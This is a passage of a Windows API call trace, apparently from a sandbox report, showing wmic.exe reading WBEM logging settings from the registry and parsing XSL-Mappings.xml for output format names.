3 [0243.901] lstrlenW (lpString=".") returned 1 [0243.901] lstrlenW (lpString="XDUWTFONO") returned 9 [0243.901] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2=".", cchCount2=1) returned 3 [0243.901] lstrlenW (lpString="LOCALHOST") returned 9 [0243.901] lstrlenW (lpString="XDUWTFONO") returned 9 [0243.901] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2="LOCALHOST", cchCount2=9) returned 3 [0243.901] lstrlenW (lpString="XDUWTFONO") returned 9 [0243.901] lstrlenW (lpString="XDUWTFONO") returned 9 [0243.901] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2="XDUWTFONO", cchCount2=9) returned 2 [0243.901] free (_Block=0x456a60) [0243.901] lstrlenW (lpString="XDUWTFONO") returned 9 [0243.901] malloc (_Size=0x14) returned 0x456a60 [0243.902] lstrlenW (lpString="XDUWTFONO") returned 9 [0243.902] lstrlenW (lpString="XDUWTFONO") returned 9 [0243.902] malloc (_Size=0x14) returned 0x456ad0 [0243.902] lstrlenW (lpString="XDUWTFONO") returned 9 [0243.902] malloc (_Size=0x8) returned 0x456af0 [0243.902] malloc (_Size=0x18) returned 0x456b10 [0243.902] malloc (_Size=0x30) returned 0x456b30 [0243.902] malloc (_Size=0x18) returned 0x456b70 [0243.902] SysStringLen (param_1="IDENTIFY") returned 0x8 [0243.902] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0243.902] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0243.902] SysStringLen (param_1="IDENTIFY") returned 0x8 [0243.902] malloc (_Size=0x30) returned 0x456b90 [0243.902] malloc (_Size=0x18) returned 0x456bd0 [0243.902] SysStringLen (param_1="IMPERSONATE") returned 0xb [0243.902] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0243.902] SysStringLen (param_1="IMPERSONATE") returned 0xb [0243.902] SysStringLen (param_1="IDENTIFY") returned 0x8 [0243.902] SysStringLen (param_1="IDENTIFY") returned 0x8 [0243.902] SysStringLen (param_1="IMPERSONATE") returned 0xb [0243.902] malloc (_Size=0x30) returned 0x456bf0 [0243.902] malloc (_Size=0x18) returned 0x456c30 [0243.902] SysStringLen (param_1="DELEGATE") returned 0x8 [0243.902] SysStringLen (param_1="IDENTIFY") returned 0x8 [0243.902] SysStringLen (param_1="DELEGATE") returned 0x8 [0243.902] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0243.903] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0243.903] SysStringLen (param_1="DELEGATE") returned 0x8 [0243.903] malloc (_Size=0x30) returned 0x456c50 [0243.903] malloc (_Size=0x18) returned 0x456c90 [0243.903] malloc (_Size=0x30) returned 0x456cb0 [0243.903] malloc (_Size=0x18) returned 0x456cf0 [0243.903] SysStringLen (param_1="NONE") returned 0x4 [0243.903] SysStringLen (param_1="DEFAULT") returned 0x7 [0243.903] SysStringLen (param_1="DEFAULT") returned 0x7 [0243.903] SysStringLen (param_1="NONE") returned 0x4 [0243.903] malloc (_Size=0x30) returned 0x456d10 [0243.903] malloc (_Size=0x18) returned 0x456d50 [0243.903] SysStringLen (param_1="CONNECT") returned 0x7 [0243.903] SysStringLen (param_1="DEFAULT") returned 0x7 [0243.903] malloc (_Size=0x30) returned 0x456d70 [0243.903] malloc (_Size=0x18) returned 0x456db0 [0243.903] SysStringLen (param_1="CALL") returned 0x4 [0243.903] SysStringLen (param_1="DEFAULT") returned 0x7 [0243.903] SysStringLen (param_1="CALL") returned 0x4 [0243.903] SysStringLen (param_1="CONNECT") returned 0x7 [0243.903] malloc (_Size=0x30) returned 0x456dd0 [0243.903] malloc (_Size=0x18) returned 0x456e10 [0243.903] SysStringLen (param_1="PKT") returned 0x3 [0243.903] SysStringLen (param_1="DEFAULT") returned 0x7 [0243.903] SysStringLen (param_1="PKT") returned 0x3 [0243.903] SysStringLen (param_1="NONE") returned 0x4 [0243.903] SysStringLen (param_1="NONE") returned 0x4 [0243.904] SysStringLen (param_1="PKT") returned 0x3 [0243.904] malloc (_Size=0x30) returned 0x456e30 [0243.904] malloc (_Size=0x18) returned 0x456e70 [0243.904] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0243.904] SysStringLen (param_1="DEFAULT") returned 0x7 [0243.904] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0243.904] SysStringLen (param_1="NONE") returned 0x4 [0243.904] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0243.904] SysStringLen (param_1="PKT") returned 0x3 [0243.904] SysStringLen (param_1="PKT") returned 0x3 [0243.904] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0243.904] malloc (_Size=0x30) returned 0x458000 [0243.905] malloc (_Size=0x18) returned 0x456e90 [0243.905] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0243.905] SysStringLen (param_1="DEFAULT") returned 0x7 [0243.905] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0243.905] SysStringLen (param_1="PKT") returned 0x3 [0243.905] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0243.905] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0243.905] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0243.905] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0243.905] malloc (_Size=0x30) returned 0x458040 [0243.905] malloc (_Size=0x40) returned 0x456eb0 [0243.905] malloc (_Size=0x20a) returned 0x456f00 [0243.905] GetSystemDirectoryW (in: lpBuffer=0x456f00, uSize=0x105 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0243.905] free (_Block=0x456f00) [0243.905] malloc (_Size=0x18) returned 0x456f00 [0243.905] malloc (_Size=0x18) returned 0x456f20 [0243.905] malloc (_Size=0x18) returned 0x456f40 [0243.905] SysStringLen (param_1="C:\\Windows\\system32") returned 0x13 [0243.905] SysStringLen (param_1="\\wbem\\") returned 0x6 [0243.905] free (_Block=0x456f00) [0243.906] free (_Block=0x456f20) [0243.906] SysStringByteLen (bstr="C:\\Windows\\system32\\wbem\\") returned 0x32 [0243.906] free (_Block=0x456f40) [0243.906] malloc (_Size=0x18) returned 0x456f00 [0243.906] malloc (_Size=0x18) returned 0x456f20 [0243.906] malloc (_Size=0x18) returned 0x456f40 [0243.906] SysStringLen (param_1="C:\\Windows\\system32\\wbem\\") returned 0x19 [0243.906] SysStringLen (param_1="XSL-Mappings.xml") returned 0x10 [0243.906] free (_Block=0x456f00) [0243.906] free (_Block=0x456f20) [0243.906] GetCurrentThreadId () returned 0x36c [0243.906] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Wbem\\CIMOM", ulOptions=0x0, samDesired=0x1, phkResult=0xcf5a0 | out: phkResult=0xcf5a0*=0xf8) returned 0x0 [0243.906] RegQueryValueExW (in: hKey=0xf8, lpValueName="Logging", lpReserved=0x0, lpType=0x0, lpData=0xcf5f0, lpcbData=0xcf590*=0x400 | out: lpType=0x0, lpData=0xcf5f0*=0x30, lpcbData=0xcf590*=0x4) returned 0x0 [0243.906] _wcsicmp (_String1="0", _String2="1") returned -1 [0243.907] _wcsicmp (_String1="0", _String2="2") returned -2 [0243.907] RegQueryValueExW (in: hKey=0xf8, lpValueName="Logging Directory", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0xcf590*=0x4 | out: lpType=0x0, lpData=0x0, lpcbData=0xcf590*=0x42) returned 0x0 [0243.907] malloc (_Size=0x86) returned 0x456f60 [0243.907] RegQueryValueExW (in: hKey=0xf8, lpValueName="Logging Directory", lpReserved=0x0, lpType=0x0, lpData=0x456f60, lpcbData=0xcf590*=0x42 | out: lpType=0x0, lpData=0x456f60*=0x25, lpcbData=0xcf590*=0x42) returned 0x0 [0243.907] lstrlenW (lpString="%systemroot%\\system32\\wbem\\Logs\\") returned 32 [0243.907] malloc (_Size=0x42) returned 0x456ff0 [0243.907] lstrlenW (lpString="%systemroot%\\system32\\wbem\\Logs\\") returned 32 [0243.907] RegQueryValueExW (in: hKey=0xf8, lpValueName="Log File Max Size", lpReserved=0x0, lpType=0x0, lpData=0xcf5f0, lpcbData=0xcf590*=0x400 | out: lpType=0x0, lpData=0xcf5f0*=0x36, lpcbData=0xcf590*=0xc) returned 0x0 [0243.907] _wtol (_String="65536") returned 65536 [0243.907] free (_Block=0x456f60) [0243.907] RegCloseKey (hKey=0x0) returned 0x6 [0243.907] CoCreateInstance (in: rclsid=0xff8f7410*(Data1=0xf6d90f12, Data2=0x9c73, Data3=0x11d3, Data4=([0]=0xb3, [1]=0x2e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0xb, [7]=0xb4)), pUnkOuter=0x0, dwClsContext=0x1, riid=0xff8f73f0*(Data1=0x2933bf95, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppv=0xcfa98 | out: ppv=0xcfa98*=0x1c571d0) returned 0x0 [0243.945] FreeThreadedDOMDocument:IXMLDOMDocument:load (in: This=0x1c571d0, xmlSource=0xcfbe0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Windows\\system32\\wbem\\XSL-Mappings.xml", varVal2=0x456f00), isSuccessful=0xcfc50 | out: isSuccessful=0xcfc50*=0xffff) returned 0x0 [0244.086] FreeThreadedDOMDocument:IXMLDOMDocument:get_documentElement (in: This=0x1c571d0, DOMElement=0xcfa90 | out: DOMElement=0xcfa90*=0x1c5bc50) returned 0x0 [0244.087] malloc (_Size=0x18) returned 0x45c560 [0244.087] IXMLDOMElement:getElementsByTagName (in: This=0x1c5bc50, tagName="XSLFORMAT", resultList=0xcfaa0 | out: resultList=0xcfaa0*=0x1c59cc0) returned 0x0 [0244.088] free (_Block=0x45c560) [0244.088] IXMLDOMNodeList:get_length (in: This=0x1c59cc0, listLength=0xcfc68 | out: listLength=0xcfc68*=21) returned 0x0 [0244.088] IXMLDOMNodeList:get_item (in: This=0x1c59cc0, index=0, listItem=0xcfa70 | out: listItem=0xcfa70*=0x1c5bd50) returned 0x0 [0244.088] IXMLDOMNode:get_text (in: This=0x1c5bd50, text=0xcfa80 | out: text=0xcfa80*="texttable.xsl") returned 0x0 [0244.089] IXMLDOMNode:get_attributes (in: This=0x1c5bd50, attributeMap=0xcfa78 | out: attributeMap=0xcfa78*=0x1c578d0) returned 0x0 [0244.089] malloc (_Size=0x18) returned 0x45c560 [0244.089] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x1c578d0, name="KEYWORD", namedItem=0xcfa88 | out: namedItem=0xcfa88*=0x1c5a280) returned 0x0 [0244.089] free (_Block=0x45c560) [0244.089] IXMLDOMNode:get_nodeValue (in: This=0x1c5a280, value=0xcfac0 | out: value=0xcfac0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="TABLE", varVal2=0x4)) returned 0x0 [0244.089] malloc (_Size=0x18) returned 0x45c560 [0244.089] malloc (_Size=0x18) returned 0x45c580 [0244.089] malloc (_Size=0x30) returned 0x458080 [0244.090] IUnknown:Release (This=0x1c5bd50) returned 0x0 [0244.090] IUnknown:Release (This=0x1c578d0) returned 0x0 [0244.090] IUnknown:Release (This=0x1c5a280) returned 0x0 [0244.090] IXMLDOMNodeList:get_item (in: This=0x1c59cc0, index=1, listItem=0xcfa70 | out: listItem=0xcfa70*=0x1c5bd50) returned 0x0 [0244.090] IXMLDOMNode:get_text (in: This=0x1c5bd50, text=0xcfa80 | out: text=0xcfa80*="textvaluelist.xsl") returned 0x0 [0244.090] IXMLDOMNode:get_attributes (in: This=0x1c5bd50, attributeMap=0xcfa78 | out: attributeMap=0xcfa78*=0x1c578d0) returned 0x0 [0244.090] malloc (_Size=0x18) returned 0x45c5a0 [0244.090] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x1c578d0, name="KEYWORD", namedItem=0xcfa88 | out: namedItem=0xcfa88*=0x1c5a280) returned 0x0 [0244.090] free (_Block=0x45c5a0) [0244.090] IXMLDOMNode:get_nodeValue (in: This=0x1c5a280, value=0xcfac0 | out: value=0xcfac0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="VALUE", varVal2=0x4)) returned 0x0 [0244.090] malloc (_Size=0x18) returned 0x45c5a0 [0244.090] malloc (_Size=0x18) returned 0x45c5c0 [0244.090] SysStringLen (param_1="VALUE") returned 0x5 [0244.090] SysStringLen (param_1="TABLE") returned 0x5 [0244.090] SysStringLen (param_1="TABLE") returned 0x5 [0244.091] SysStringLen (param_1="VALUE") returned 0x5 [0244.091] malloc (_Size=0x30) returned 0x4580c0 [0244.091] IUnknown:Release (This=0x1c5bd50) returned 0x0 [0244.091] IUnknown:Release (This=0x1c578d0) returned 0x0 [0244.091] IUnknown:Release (This=0x1c5a280) returned 0x0 [0244.091] IXMLDOMNodeList:get_item (in: This=0x1c59cc0, index=2, listItem=0xcfa70 | out: listItem=0xcfa70*=0x1c5bd50) returned 0x0 [0244.091] IXMLDOMNode:get_text (in: This=0x1c5bd50, text=0xcfa80 | out: text=0xcfa80*="textvaluelist.xsl") returned 0x0 [0244.091] IXMLDOMNode:get_attributes (in: This=0x1c5bd50, attributeMap=0xcfa78 | out: attributeMap=0xcfa78*=0x1c578d0) returned 0x0 [0244.091] malloc (_Size=0x18) returned 0x45c5e0 [0244.091] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x1c578d0, name="KEYWORD", namedItem=0xcfa88 | out: namedItem=0xcfa88*=0x1c5a280) returned 0x0 [0244.091] free (_Block=0x45c5e0) [0244.091] IXMLDOMNode:get_nodeValue (in: This=0x1c5a280, value=0xcfac0 | out: value=0xcfac0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="LIST", varVal2=0x4)) returned 0x0 [0244.091] malloc (_Size=0x18) returned 0x45c5e0 [0244.091] malloc (_Size=0x18) returned 0x45c600 [0244.091] SysStringLen (param_1="LIST") returned 0x4 [0244.091] SysStringLen (param_1="TABLE") returned 0x5 [0244.091] malloc (_Size=0x30) returned 0x458100 [0244.092] IUnknown:Release (This=0x1c5bd50) returned 0x0 [0244.092] IUnknown:Release (This=0x1c578d0) returned 0x0 [0244.092] IUnknown:Release (This=0x1c5a280) returned 0x0 [0244.092] IXMLDOMNodeList:get_item (in: This=0x1c59cc0, index=3, listItem=0xcfa70 | out: listItem=0xcfa70*=0x1c5bd50) returned 0x0 [0244.092] IXMLDOMNode:get_text (in: This=0x1c5bd50, text=0xcfa80 | out: text=0xcfa80*="rawxml.xsl") returned 0x0 [0244.092] IXMLDOMNode:get_attributes (in: This=0x1c5bd50, attributeMap=0xcfa78 | out: attributeMap=0xcfa78*=0x1c578d0) returned 0x0 [0244.092] malloc (_Size=0x18) returned 0x45c620 [0244.092] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x1c578d0, name="KEYWORD", namedItem=0xcfa88 | out: namedItem=0xcfa88*=0x1c5a280) returned 0x0 [0244.092] free (_Block=0x45c620) [0244.092] IXMLDOMNode:get_nodeValue (in: This=0x1c5a280, value=0xcfac0 | out: value=0xcfac0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="RAWXML", varVal2=0x4)) returned 0x0 [0244.092] malloc (_Size=0x18) returned 0x45c620 [0244.092] malloc (_Size=0x18) returned 0x45c640 [0244.092] SysStringLen (param_1="RAWXML") returned 0x6 [0244.092] SysStringLen (param_1="TABLE") returned 0x5 [0244.092] SysStringLen (param_1="RAWXML") returned 0x6 [0244.092] SysStringLen (param_1="LIST") returned 0x4 [0244.093] SysStringLen (param_1="LIST") returned 0x4 [0244.093] SysStringLen (param_1="RAWXML") returned 0x6 [0244.093] malloc (_Size=0x30) returned 0x458140 [0244.093] IUnknown:Release (This=0x1c5bd50) returned 0x0 [0244.093] IUnknown:Release (This=0x1c578d0) returned 0x0 [0244.093] IUnknown:Release (This=0x1c5a280) returned 0x0 [0244.093] IXMLDOMNodeList:get_item (in: This=0x1c59cc0, index=4, listItem=0xcfa70 | out: listItem=0xcfa70*=0x1c5bd50) returned 0x0 [0244.093] IXMLDOMNode:get_text (in: This=0x1c5bd50, text=0xcfa80 | out: text=0xcfa80*="htable.xsl") returned 0x0 [0244.093] IXMLDOMNode:get_attributes (in: This=0x1c5bd50, attributeMap=0xcfa78 | out: attributeMap=0xcfa78*=0x1c578d0) returned 0x0 [0244.093] malloc (_Size=0x18) returned 0x45c660 [0244.093] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x1c578d0, name="KEYWORD", namedItem=0xcfa88 | out: namedItem=0xcfa88*=0x1c5a280) returned 0x0 [0244.093] free (_Block=0x45c660) [0244.093] IXMLDOMNode:get_nodeValue (in: This=0x1c5a280, value=0xcfac0 | out: value=0xcfac0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="HTABLE", varVal2=0x4)) returned 0x0 [0244.093] malloc (_Size=0x18) returned 0x45c660 [0244.093] malloc (_Size=0x18) returned 0x45c680 [0244.093] SysStringLen (param_1="HTABLE") returned 0x6 [0244.094] SysStringLen (param_1="TABLE") returned 0x5 [0244.094] SysStringLen (param_1="HTABLE") returned 0x6 [0244.094] SysStringLen (param_1="LIST") returned 0x4 [0244.094] malloc (_Size=0x30) returned 0x458180 [0244.094] IUnknown:Release (This=0x1c5bd50) returned 0x0 [0244.094] IUnknown:Release (This=0x1c578d0) returned 0x0 [0244.094] IUnknown:Release (This=0x1c5a280) returned 0x0 [0244.094] IXMLDOMNodeList:get_item (in: This=0x1c59cc0, index=5, listItem=0xcfa70 | out: listItem=0xcfa70*=0x1c5bd50) returned 0x0 [0244.094] IXMLDOMNode:get_text (in: This=0x1c5bd50, text=0xcfa80 | out: text=0xcfa80*="hform.xsl") returned 0x0 [0244.094] IXMLDOMNode:get_attributes (in: This=0x1c5bd50, attributeMap=0xcfa78 | out: attributeMap=0xcfa78*=0x1c578d0) returned 0x0 [0244.094] malloc (_Size=0x18) returned 0x45c6a0 [0244.094] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x1c578d0, name="KEYWORD", namedItem=0xcfa88 | out: namedItem=0xcfa88*=0x1c5a280) returned 0x0 [0244.094] free (_Block=0x45c6a0) [0244.094] IXMLDOMNode:get_nodeValue (in: This=0x1c5a280, value=0xcfac0 | out: value=0xcfac0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="HFORM", varVal2=0x4)) returned 0x0 [0244.094] malloc (_Size=0x18) returned 0x45c6a0 [0244.094] malloc (_Size=0x18) returned 0x45c6c0 [0244.094] SysStringLen (param_1="HFORM") returned 0x5 [0244.095] SysStringLen (param_1="TABLE") returned 0x5 [0244.095] SysStringLen (param_1="HFORM") returned 0x5 [0244.095] SysStringLen (param_1="LIST") returned 0x4 [0244.095] SysStringLen (param_1="HFORM") returned 0x5 [0244.095] SysStringLen (param_1="HTABLE") returned 0x6 [0244.095] malloc (_Size=0x30) returned 0x4581c0 [0244.095] IUnknown:Release (This=0x1c5bd50) returned 0x0 [0244.095] IUnknown:Release (This=0x1c578d0) returned 0x0 [0244.095] IUnknown:Release (This=0x1c5a280) returned 0x0 [0244.095] IXMLDOMNodeList:get_item (in: This=0x1c59cc0, index=6, listItem=0xcfa70 | out: listItem=0xcfa70*=0x1c5bd50) returned 0x0 [0244.095] IXMLDOMNode:get_text (in: This=0x1c5bd50, text=0xcfa80 | out: text=0xcfa80*="xml.xsl") returned 0x0 [0244.095] IXMLDOMNode:get_attributes (in: This=0x1c5bd50, attributeMap=0xcfa78 | out: attributeMap=0xcfa78*=0x1c578d0) returned 0x0 [0244.095] malloc (_Size=0x18) returned 0x45c6e0 [0244.095] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x1c578d0, name="KEYWORD", namedItem=0xcfa88 | out: namedItem=0xcfa88*=0x1c5a280) returned 0x0 [0244.095] free (_Block=0x45c6e0) [0244.095] IXMLDOMNode:get_nodeValue (in: This=0x1c5a280, value=0xcfac0 | out: value=0xcfac0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="XML", varVal2=0x4)) returned 0x0 [0244.095] malloc (_Size=0x18) returned 0x45c6e0 [0244.096] malloc (_Size=0x18) returned 0x45c700 [0244.096] SysStringLen (param_1="XML") returned 0x3 [0244.096] SysStringLen (param_1="TABLE") returned 0x5 [0244.096] SysStringLen (param_1="XML") returned 0x3 [0244.096] SysStringLen (param_1="VALUE") returned 0x5 [0244.096] SysStringLen (param_1="VALUE") returned 0x5 [0244.096] SysStringLen (param_1="XML") returned 0x3 [0244.096] malloc (_Size=0x30) returned 0x458200 [0244.096] IUnknown:Release (This=0x1c5bd50) returned 0x0 [0244.096] IUnknown:Release (This=0x1c578d0) returned 0x0 [0244.096] IUnknown:Release (This=0x1c5a280) returned 0x0 [0244.096] IXMLDOMNodeList:get_item (in: This=0x1c59cc0, index=7, listItem=0xcfa70 | out: listItem=0xcfa70*=0x1c5bd50) returned 0x0 [0244.096] IXMLDOMNode:get_text (in: This=0x1c5bd50, text=0xcfa80 | out: text=0xcfa80*="mof.xsl") returned 0x0 [0244.096] IXMLDOMNode:get_attributes (in: This=0x1c5bd50, attributeMap=0xcfa78 | out: attributeMap=0xcfa78*=0x1c578d0) returned 0x0 [0244.096] malloc (_Size=0x18) returned 0x45c720 [0244.096] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x1c578d0, name="KEYWORD", namedItem=0xcfa88 | out: namedItem=0xcfa88*=0x1c5a280) returned 0x0 [0244.096] free (_Block=0x45c720) [0244.097] IXMLDOMNode:get_nodeValue (in: This=0x1c5a280, value=0xcfac0 | out: value=0xcfac0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="MOF", varVal2=0x4)) returned 0x0 [0244.097] malloc (_Size=0x18) returned 0x45c720 [0244.097] malloc (_Size=0x18) returned 0x45c740 [0244.097] SysStringLen (param_1="MOF") returned 0x3 [0244.097] SysStringLen (param_1="TABLE") returned 0x5 [0244.097] SysStringLen (param_1="MOF") returned 0x3 [0244.097] SysStringLen (param_1="LIST") returned 0x4 [0244.097] SysStringLen (param_1="MOF") returned 0x3 [0244.097] SysStringLen (param_1="RAWXML") returned 0x6 [0244.097] SysStringLen (param_1="LIST") returned 0x4 [0244.097] SysStringLen (param_1="MOF") returned 0x3 [0244.097] malloc (_Size=0x30) returned 0x458240 [0244.097] IUnknown:Release (This=0x1c5bd50) returned 0x0 [0244.097] IUnknown:Release (This=0x1c578d0) returned 0x0 [0244.097] IUnknown:Release (This=0x1c5a280) returned 0x0 [0244.097] IXMLDOMNodeList:get_item (in: This=0x1c59cc0, index=8, listItem=0xcfa70 | out: listItem=0xcfa70*=0x1c5bd50) returned 0x0 [0244.097] IXMLDOMNode:get_text (in: This=0x1c5bd50, text=0xcfa80 | out: text=0xcfa80*="csv.xsl") returned 0x0 [0244.097] IXMLDOMNode:get_attributes (in: This=0x1c5bd50, attributeMap=0xcfa78 | out: attributeMap=0xcfa78*=0x1c578d0) returned 0x0 [0244.097] malloc (_Size=0x18) returned 0x45c760 [0244.097] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x1c578d0, name="KEYWORD", namedItem=0xcfa88 | out: namedItem=0xcfa88*=0x1c5a280) returned 0x0 [0244.098] free (_Block=0x45c760) [0244.098] IXMLDOMNode:get_nodeValue (in: This=0x1c5a280, value=0xcfac0 | out: value=0xcfac0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="CSV", varVal2=0x4)) returned 0x0 [0244.098] malloc (_Size=0x18) returned 0x45c760 [0244.098] malloc (_Size=0x18) returned 0x45c780 [0244.098] SysStringLen (param_1="CSV") returned 0x3 [0244.098] SysStringLen (param_1="TABLE") returned 0x5 [0244.098] SysStringLen (param_1="CSV") returned 0x3 [0244.098] SysStringLen (param_1="LIST") returned 0x4 [0244.098] SysStringLen (param_1="CSV") returned 0x3 [0244.098] SysStringLen (param_1="HTABLE") returned 0x6 [0244.098] SysStringLen (param_1="CSV") returned 0x3 [0244.098] SysStringLen (param_1="HFORM") returned 0x5 [0244.098] malloc (_Size=0x30) returned 0x458280 [0244.098] IUnknown:Release (This=0x1c5bd50) returned 0x0 [0244.098] IUnknown:Release (This=0x1c578d0) returned 0x0 [0244.098] IUnknown:Release (This=0x1c5a280) returned 0x0 [0244.098] IXMLDOMNodeList:get_item (in: This=0x1c59cc0, index=9, listItem=0xcfa70 | out: listItem=0xcfa70*=0x1c5bd50) returned 0x0 [0244.098] IXMLDOMNode:get_text (in: This=0x1c5bd50, text=0xcfa80 | out: text=0xcfa80*="texttable.xsl") returned 0x0 [0244.098] IXMLDOMNode:get_attributes (in: This=0x1c5bd50, attributeMap=0xcfa78 | out: attributeMap=0xcfa78*=0x1c578d0) returned 0x0 [0244.098] malloc (_Size=0x18) returned 0x45c7a0 [0244.099] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x1c578d0, name="KEYWORD", namedItem=0xcfa88 | out: namedItem=0xcfa88*=0x1c5a280) returned 0x0 [0244.099] free (_Block=0x45c7a0) [0244.099] IXMLDOMNode:get_nodeValue (in: This=0x1c5a280, value=0xcfac0 | out: value=0xcfac0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="texttablewsys.xsl", varVal2=0x4)) returned 0x0 [0244.099] malloc (_Size=0x18) returned 0x45c7a0 [0244.099] malloc (_Size=0x18) returned 0x45c7c0 [0244.099] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0244.099] SysStringLen (param_1="TABLE") returned 0x5 [0244.099] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0244.099] SysStringLen (param_1="VALUE") returned 0x5 [0244.099] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0244.099] SysStringLen (param_1="XML") returned 0x3 [0244.099] SysStringLen (param_1="XML") returned 0x3 [0244.099] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0244.099] malloc (_Size=0x30) returned 0x4582c0 [0244.099] IUnknown:Release (This=0x1c5bd50) returned 0x0 [0244.099] IUnknown:Release (This=0x1c578d0) returned 0x0 [0244.099] IUnknown:Release (This=0x1c5a280) returned 0x0 [0244.099] IXMLDOMNodeList:get_item (in: This=0x1c59cc0, index=10, listItem=0xcfa70 | out: listItem=0xcfa70*=0x1c5bd50) returned 0x0 [0244.099] IXMLDOMNode:get_text (in: This=0x1c5bd50, text=0xcfa80 | out: text=0xcfa80*="texttable.xsl") returned 0x0 [0244.100] IXMLDOMNode:get_attributes (in: This=0x1c5bd50, attributeMap=0xcfa78 | out: attributeMap=0xcfa78*=0x1c578d0) returned 0x0 [0244.100] malloc (_Size=0x18) returned 0x45c7e0 [0244.100] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x1c578d0, name="KEYWORD", namedItem=0xcfa88 | out: namedItem=0xcfa88*=0x1c5a280) returned 0x0 [0244.100] free (_Block=0x45c7e0) [0244.100] IXMLDOMNode:get_nodeValue (in: This=0x1c5a280, value=0xcfac0 | out: value=0xcfac0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="texttablewsys", varVal2=0x4)) returned 0x0 [0244.100] malloc (_Size=0x18) returned 0x45c7e0 [0244.100] malloc (_Size=0x18) returned 0x45c800 [0244.100] SysStringLen (param_1="texttablewsys") returned 0xd [0244.100] SysStringLen (param_1="TABLE") returned 0x5 [0244.100] SysStringLen (param_1="texttablewsys") returned 0xd [0244.100] SysStringLen (param_1="XML") returned 0x3 [0244.100] SysStringLen (param_1="texttablewsys") returned 0xd [0244.100] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0244.100] SysStringLen (param_1="XML") returned 0x3 [0244.100] SysStringLen (param_1="texttablewsys") returned 0xd [0244.100] malloc (_Size=0x30) returned 0x458300 [0244.100] IUnknown:Release (This=0x1c5bd50) returned 0x0 [0244.100] IUnknown:Release (This=0x1c578d0) returned 0x0 [0244.100] IUnknown:Release (This=0x1c5a280) returned 0x0 [0244.101] IXMLDOMNodeList:get_item (in: This=0x1c59cc0, index=11, listItem=0xcfa70 | out: listItem=0xcfa70*=0x1c5bd50) returned 0x0 [0244.101] IXMLDOMNode:get_text (in: This=0x1c5bd50, text=0xcfa80 | out: text=0xcfa80*="texttable.xsl") returned 0x0 [0244.101] IXMLDOMNode:get_attributes (in: This=0x1c5bd50, attributeMap=0xcfa78 | out: attributeMap=0xcfa78*=0x1c578d0) returned 0x0 [0244.101] malloc (_Size=0x18) returned 0x45c820 [0244.101] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x1c578d0, name="KEYWORD", namedItem=0xcfa88 | out: namedItem=0xcfa88*=0x1c5a280) returned 0x0 [0244.101] free (_Block=0x45c820) [0244.101] IXMLDOMNode:get_nodeValue (in: This=0x1c5a280, value=0xcfac0 | out: value=0xcfac0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclitableformat.xsl", varVal2=0x4)) returned 0x0 [0244.101] malloc (_Size=0x18) returned 0x45c820 [0244.101] malloc (_Size=0x18) returned 0x45c840 [0244.101] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0244.101] SysStringLen (param_1="TABLE") returned 0x5 [0244.101] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0244.101] SysStringLen (param_1="XML") returned 0x3 [0244.101] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0244.101] SysStringLen 